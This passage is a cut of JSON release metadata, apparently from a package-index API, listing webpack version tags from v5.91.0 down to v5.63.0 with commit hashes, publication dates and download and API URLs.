11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_i